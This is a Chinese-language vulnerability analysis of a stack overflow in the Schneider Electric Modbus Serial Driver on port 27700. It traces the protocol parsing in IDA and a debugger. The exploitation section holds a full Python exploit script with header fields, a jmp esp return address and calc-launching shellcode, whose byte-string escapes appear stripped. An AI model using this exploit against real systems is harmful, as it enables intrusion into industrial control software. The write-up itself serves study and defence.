前言
Schneider Electric Modbus Serial Driver 会监听 27700 端口,程序在处理客户端发送的数据时会导致栈溢出。
测试环境: windows xp sp3
相关文件链接
链接:https://pan.baidu.com/s/1d_-WT6gUJmbnJ8cRfCNl1g
提取码:qnpb
漏洞分析
下载安装程序,安装完成后,程序会监听 27700 端口
可以看到监听端口的进程名为 ModbusDrv.exe
, 把它拿 IDA
打开进行后续分析。
定位协议处理代码
对于 TCP
服务端程序来说,接收数据一般是用 recv
函数,所以在分析未知协议的数据格式时,我们可以在 IDA
中搜索 recv
函数的引用找到对协议数据处理的部分,或者直接在 recv
函数下断点, 然后往接收数据的缓冲区处设置读/写断点来找到数据处理部分。
使用 IDA 交叉引用定位
这个程序比较简单只有一个地方引用了 recv
函数。
这个函数就是对 recv
函数进行了一层封装,作用是接收到 len
的数据才返回 1
,否则返回 0
. 继续对这个函数进行交叉引用, 发现也只有一个函数用到了这个接收数据函数。
跳过去看看
可以发现首先接收 7
字节的数据, 然后从接收到的数据里面取出一些 short
型数据。这里我们可以发送一些数据来测试一下。
def test():
ip = "192.168.245.134"
port = 27700
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
payload = "aabbccddeeff11223344".decode("hex")
sock.send(payload)
调试器调试发现 payload
的前 7 个字节( aabbccddeeff11
) 被接收到了缓冲区内, 由此可以确定定位到了数据处理的起始位置。
使用调试器的硬件断点定位
我们还可以使用调试器来快速定位数据处理的代码所在的位置。首先附加上程序, 然后给 recv
函数下个断点
bp recv
然后运行程序, 再次运行测试脚本。程序会在 recv
函数位置断下来, 此时我们可以从栈里面拿到保存数据的缓冲区地址。
单步运行到 recv
函数的末尾, 查看缓冲区数据,可以看到客户端发送的数据已经被存放缓冲区里面了。
此时我们在缓冲区的开头设置硬件断点。
然后继续运行, 会断在我们上面定位的函数里面
定位到数据处理部分后,我们继续往下分析。
首先接收 7 字节数据保存到 recv_buf
里面, 后面开始对接收的数据进行处理。在分析过程中为 recv_buf
创建了一个结构体辅助分析。
struct recv_struct
{
__int16 nop;
__int16 key;
__int16 size;
};
首先把输入数据的第 3,4
个字节按大端序存储到 key
这个 short
型变量里面, 然后把第 5,6
个字节按大端序转成 short
型 减一后存储到 control_size
。
比如当我们输入 aabbccddeeff11
时, key
就为 0xccdd
, 而 control_size
就是 0xeefe
。
解析完开头 7 个字节的数据后,会根据 key
的值选择进入的分支。
当 key
的值为 0xffff
时, 会再次调用 recv_until
函数, 此时的缓冲区还是原来栈上面的缓冲区,而 len
参数则是从我们输入数据的最开始 7
字节里面取出的 control_size
. 通过观察栈的布局,我们知道栈缓冲区的大小只有 0x830
字节。
所以这里是栈溢出。但是这个地方是无法利用的原因是该处代码下面还有一些对格式的校验,如果不对的话就会直接调用 ExitThread
结束线程。
继续往下看。
上述代码的逻辑首先是通过 control_size
接收数据, 然后把接收到的数据的开头两个字节按照大端序的方式保存到 v14
里面, 当 v14
为 0x64
时会进入 handle_data
函数对后面的数据进行进一步的处理。传入的参数就是除去两字节开头的地址和剩下的数据长度。
函数首先就会把数据复制到函数的栈缓冲区里面,查看栈帧发现 local_buf
只有 0x5dc
字节。
我们可以通过覆盖这个函数的返回地址来完成漏洞利用。
漏洞利用
由于是 XP
系统, 没有 DEP
, 可以采用 jmp esp + shellcode
的方式来完成利用。
def calc_exp():
shellcode = "x90" * 100 # x90 bad char bypass
shellcode += "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8b"
shellcode += "x50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7"
shellcode += "x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcf"
shellcode += "x0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3c"
shellcode += "x8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01"
shellcode += "xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31"
shellcode += "xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7d"
shellcode += "xf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66"
shellcode += "x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0"
shellcode += "x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5f"
shellcode += "x5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00"
shellcode += "x00x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5"
shellcode += "xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0a"
shellcode += "x80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53"
shellcode += "xffxd5x63x61x6cx63x00"
ip = "192.168.245.134"
port = 27700
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
payload = "xaaxbb" # 无用字段
payload += "xffxff" # 保证可以进入下一个 recv
payload += "x07x10" # size 域, 下一个 recv 的 size
payload += "xdd" # padding
payload += "x00x64" # 进入 0x64 分支, 避免 end_thread 调用 exit
payload += "A" * 0x5dc
payload += p32(0x7ffa4512) # 通用 jmp esp , xp , 2k3
payload += shellcode
payload += "B" * (0x710 - 1 - 2 - 0x5dc - 4 - len(shellcode))
sock.send(payload)
主要是要设置一些字段保证可以顺利通过前面的一些校验。
漏洞修复
漏洞修复比较简单就是对长度字段进行了大小校验。